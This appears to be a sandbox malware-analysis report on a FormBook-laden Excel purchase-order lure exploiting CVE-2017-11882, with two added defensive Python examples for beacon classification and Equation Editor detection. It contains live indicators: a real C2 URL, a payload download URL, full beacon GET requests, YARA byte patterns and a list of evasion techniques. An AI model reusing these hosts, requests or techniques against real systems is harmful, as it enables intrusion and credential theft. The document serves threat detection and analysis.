
Windows Analysis Report HME AG PO 2091.xlsx

Overview

General Information

Sample Name: HME AG PO 2091.xlsx
Analysis ID: 553050
MD5: 29ee298412e6d2cb968a883563837cbe
SHA1: 7ed1c5713ba7ff23e36fecdedb0f0c012f6c647b
SHA256: 22355ce0bfc092836a0d62f6cbb54d03aa6fb26091ecd1907922fb9f6e0d0880
Tags: xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1444 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2860 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • word.exe (PID: 2256 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 8EDDCC35719034649F6947B2B08BCDF3)
      • word.exe (PID: 1612 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 8EDDCC35719034649F6947B2B08BCDF3)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cscript.exe (PID: 2980 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: A3A35EE79C64A640152B3113E6E254E2)
            • cmd.exe (PID: 1292 cmdline: /c del "C:\Users\user\AppData\Roaming\word.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}
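The configuration above carries one real C2 URL and a long decoy list, and the beacons recorded under Networking go to decoy domains (www.ponto-bras.space, www.hydrogendatapower.com) with the same URI path as the real panel. The following is an added example, not code from the Joe Sandbox report, showing why a hunt should key on the C2 path rather than the C2 domain: it parses each observed request, matches the path against the extracted config, and reports whether the host is the real panel, a configured decoy, or unknown. CONFIG is the configuration extracted in this report (decoy list shortened); the request texts are reconstructed from the report's traffic lines, and the one to www.rthearts.com is constructed here to exercise the real-C2 branch.

```python
"""Match observed HTTP requests against an extracted FormBook configuration.

Added example; not code from the Joe Sandbox report. FormBook beacons to its
decoy domains with the same URI path it uses for the real panel, so the path
is the stable indicator and the Host header only tells decoy from panel.
"""
from typing import Dict
from urllib.parse import parse_qs, urlsplit

# Extracted configuration from this report (decoy list shortened).
CONFIG = {
    "C2 list": ["www.rthearts.com/nk6l/"],
    "decoy": ["cbnextra.com", "entitysystemsinc.com", "ponto-bras.space",
              "hydrogendatapower.com", "paypal-caseid521.com", "mnbvending.com"],
}


def _bare(host: str) -> str:
    """Drop a leading 'www.' so config entries and Host headers compare equal."""
    host = host.lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def c2_paths(config: dict) -> Dict[str, str]:
    """Map each configured C2 URI path to its host.

    The config stores URLs without a scheme, so one is prepended for urlsplit.
    """
    out = {}
    for url in config["C2 list"]:
        parts = urlsplit("http://" + url)
        out[parts.path] = _bare(parts.hostname or "")
    return out


def parse_request(raw: str):
    """Split one raw HTTP request into (method, target, lower-cased headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify(raw: str, config: dict) -> dict:
    """Decide whether a request is a FormBook beacon and, if so, whether it
    went to the real panel, a decoy from the config, or an unknown host."""
    method, target, headers = parse_request(raw)
    host = headers.get("host", "")
    parts = urlsplit(target)
    paths = c2_paths(config)
    verdict = {"host": host, "path": parts.path, "formbook": parts.path in paths}
    if not verdict["formbook"]:
        return verdict
    bare = _bare(host)
    if bare == paths[parts.path]:
        role = "c2"
    elif bare in config["decoy"]:
        role = "decoy"
    else:
        role = "unknown"
    verdict.update({
        "role": role,
        "method": method,
        # FormBook GET beacons carry a long base64-like blob and a short key.
        "params": sorted(parse_qs(parts.query)),
        # The report flags these requests for carrying no User-Agent at all.
        "user_agent": headers.get("user-agent"),
    })
    return verdict


# Requests reconstructed from the report's traffic lines (UA string shortened).
BEACON_PONTO = ("GET /nk6l/?f4=dUEi0UXeDjZ3satn024Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4Zp7QfR2IB/+as7LEQ==&9r7t=5jSPntk89D HTTP/1.1\r\n"
                "Host: www.ponto-bras.space\r\nConnection: close\r\n\r\n")
BEACON_HYDRO = ("GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1\r\n"
                "Host: www.hydrogendatapower.com\r\nConnection: close\r\n\r\n")
# Constructed: the same beacon aimed at the configured panel host.
BEACON_PANEL = BEACON_PONTO.replace("www.ponto-bras.space", "www.rthearts.com")
DOWNLOAD = ("GET /ctf.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n"
            "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0)\r\n"
            "Host: rfr.lt\r\nConnection: Keep-Alive\r\n\r\n")

if __name__ == "__main__":
    for req in (BEACON_PONTO, BEACON_HYDRO, BEACON_PANEL, DOWNLOAD):
        print(classify(req, CONFIG))
```

Blocking only www.rthearts.com would leave both observed beacons unflagged; matching on the `/nk6l/` path flags all three, and the `role` field tells the analyst which connection, if any, actually reached the panel.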

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18839:$sqlite3step: 68 34 1C 7B E1
  • 0x1894c:$sqlite3step: 68 34 1C 7B E1
  • 0x18868:$sqlite3text: 68 38 2A 90 C5
  • 0x1898d:$sqlite3text: 68 38 2A 90 C5
  • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(31 further memory-dump entries are collapsed on the original page)

      Unpacked PEs

Source | Rule | Description | Author | Strings
5.1.word.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.1.word.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.1.word.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18839:$sqlite3step: 68 34 1C 7B E1
  • 0x1894c:$sqlite3step: 68 34 1C 7B E1
  • 0x18868:$sqlite3text: 68 38 2A 90 C5
  • 0x1898d:$sqlite3text: 68 38 2A 90 C5
  • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
5.2.word.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.word.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(28 further unpacked-PE entries are collapsed on the original page)

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 91.203.68.162, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2860, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2860, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\AppData\Roaming\word.exe, CommandLine: C:\Users\user\AppData\Roaming\word.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\word.exe, NewProcessName: C:\Users\user\AppData\Roaming\word.exe, OriginalFileName: C:\Users\user\AppData\Roaming\word.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2860, ProcessCommandLine: C:\Users\user\AppData\Roaming\word.exe, ProcessId: 2256
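The three Sigma hits above all pivot on the same fact: EQNEDT32.EXE is a COM server that renders equations and has no legitimate reason to spawn a process, open a socket, or write an executable. Because Equation Editor is activated over COM rather than by Excel directly (the report records its parent as "unknown"), a parent-child rule on EXCEL.EXE would miss it; the rules therefore key on EQNEDT32.EXE itself. The following is an added example, not code from the Joe Sandbox report or from the Sigma project, that re-implements those checks in plain Python so they can be run against a handful of events. The events are constructed from the report's process tree and Sigma data; the field names follow Sysmon event IDs 1 (process create), 3 (network connect) and 11 (file create).

```python
"""Equation Editor abuse detection over Sysmon-style events.

Added example; not code from the Joe Sandbox report or the Sigma project.
Re-implements the checks behind the report's Sigma hits (EQNEDT32.EXE
starting a process, connecting out, dropping a file) plus the weaker
"Equation Editor started" signal that roots the chain.
"""
from dataclasses import dataclass
from typing import Iterable, List

# Paths and PIDs below are taken from the report's process tree.
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
WORD_EXE = r"C:\Users\user\AppData\Roaming\word.exe"
DROPPED = (r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
           r"\Content.IE5\ZAE7RW1P\ctf[1].exe")


@dataclass(frozen=True)
class Alert:
    rule: str
    severity: str
    pid: int
    detail: str


def _is_eqnedt(image: str) -> bool:
    """Match on the image name only; the install path varies by Office version."""
    return image.upper().endswith("\\EQNEDT32.EXE")


def detect(events: Iterable[dict]) -> List[Alert]:
    """Run the four rules over a stream of Sysmon-style event dicts."""
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 1 and _is_eqnedt(ev["Image"]):
            # Legitimate equation editing produces this too, so on its own it
            # is informational; it matters as the root of the chain below.
            alerts.append(Alert("Office Equation Editor has been started", "low",
                                ev["ProcessId"], ev["CommandLine"]))
        elif eid == 1 and _is_eqnedt(ev.get("ParentImage", "")):
            # EQNEDT32.EXE never spawns children legitimately; this is the
            # condition behind "Droppers Exploiting CVE-2017-11882".
            alerts.append(Alert("Office equation editor starts processes", "critical",
                                ev["ProcessId"], ev["Image"]))
        elif eid == 3 and _is_eqnedt(ev["Image"]) and ev.get("Initiated", False):
            alerts.append(Alert("EQNEDT32.EXE connecting to internet", "critical",
                                ev["ProcessId"],
                                f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'))
        elif eid == 11 and _is_eqnedt(ev["Image"]):
            alerts.append(Alert("File dropped by EQNEDT32.EXE", "critical",
                                ev["ProcessId"], ev["TargetFilename"]))
    return alerts


def critical_pids(events: Iterable[dict]) -> set:
    """PIDs to contain first: EQNEDT32.EXE once it misbehaves, and anything it spawned."""
    return {a.pid for a in detect(events) if a.severity == "critical"}


# Constructed events mirroring the report's process tree and Sigma data.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 2860, "Image": EQNEDT,
     "CommandLine": f'"{EQNEDT}" -Embedding', "ParentImage": "unknown"},
    {"EventID": 3, "ProcessId": 2860, "Image": EQNEDT, "Initiated": True,
     "SourceIp": "192.168.2.22", "SourcePort": 49165,
     "DestinationIp": "91.203.68.162", "DestinationPort": 80},
    {"EventID": 11, "ProcessId": 2860, "Image": EQNEDT, "TargetFilename": DROPPED},
    {"EventID": 1, "ProcessId": 2256, "Image": WORD_EXE, "CommandLine": WORD_EXE,
     "ParentImage": EQNEDT, "ParentProcessId": 2860},
    # Second-stage word.exe is a child of word.exe, not of EQNEDT32: no alert.
    {"EventID": 1, "ProcessId": 1612, "Image": WORD_EXE, "CommandLine": WORD_EXE,
     "ParentImage": WORD_EXE, "ParentProcessId": 2256},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.rule}: pid {a.pid} {a.detail}")
```

The rules are deliberately allow-list free: the only decision is whether the image is EQNEDT32.EXE, which keeps them robust against the hollowing and injection seen later in this chain, where the interesting activity moves into explorer.exe and cscript.exe and process-name rules no longer help.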

          Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}
Multi AV Scanner detection for submitted file
Source: HME AG PO 2091.xlsx | VirusTotal: Detection: 42%
Source: HME AG PO 2091.xlsx | ReversingLabs: Detection: 32%
Yara detected FormBook
Source: Yara match | File source: 5.1.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.word.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.word.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.word.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.word.exe.430000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.word.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.word.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.word.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.word.exe.430000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.word.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.word.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.673637759.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.673598531.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://rfr.lt/ctf.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe | ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\nskF75C.tmp\mtmmtvzho.dll | ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Roaming\word.exe | ReversingLabs: Detection: 41%
Machine Learning detection for sample
Source: HME AG PO 2091.xlsx | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\word.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.word.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.word.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.cscript.exe.2abf840.7.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.word.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.word.exe.400000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.word.exe.430000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.word.exe.400000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.cscript.exe.4d22e0.0.unpack | Avira: Label: TR/Patched.Ren.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\word.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: word.exe, word.exe, 00000005.00000002.519963830.0000000000980000.00000040.00000001.sdmp, word.exe, 00000005.00000003.460762852.0000000000230000.00000004.00000001.sdmp, word.exe, 00000005.00000002.520313707.0000000000B00000.00000040.00000001.sdmp, word.exe, 00000005.00000003.461783755.0000000000440000.00000004.00000001.sdmp, cscript.exe, cscript.exe, 00000007.00000002.674110480.00000000022E0000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.674256925.0000000002460000.00000040.00000001.sdmp, cscript.exe, 00000007.00000003.517708547.0000000001FF0000.00000004.00000001.sdmp
Source: Binary string: cscript.pdbN source: word.exe, 00000005.00000002.518071129.0000000000800000.00000040.00020000.sdmp, word.exe, 00000005.00000002.518112601.000000000089D000.00000004.00000020.sdmp
Source: Binary string: cscript.pdb source: word.exe, 00000005.00000002.518071129.0000000000800000.00000040.00020000.sdmp, word.exe, 00000005.00000002.518112601.000000000089D000.00000004.00000020.sdmp
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_00405D7C FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 4_2_00402630 FindFirstFileA,
Source: global traffic | DNS query: name: rfr.lt
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 91.203.68.162:80
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 91.203.68.162:80

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe | Domain query: www.ponto-bras.space
Source: C:\Windows\explorer.exe | Domain query: www.hydrogendatapower.com
Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.212 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.rthearts.com/nk6l/
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: NANO-ASLV NANO-ASLV
Source: global traffic | HTTP traffic detected: GET /nk6l/?f4=dUEi0UXeDjZ3satn024Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4Zp7QfR2IB/+as7LEQ==&9r7t=5jSPntk89D HTTP/1.1 | Host: www.ponto-bras.space | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1 | Host: www.hydrogendatapower.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1 | Host: www.hydrogendatapower.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 23.227.38.74 23.227.38.74
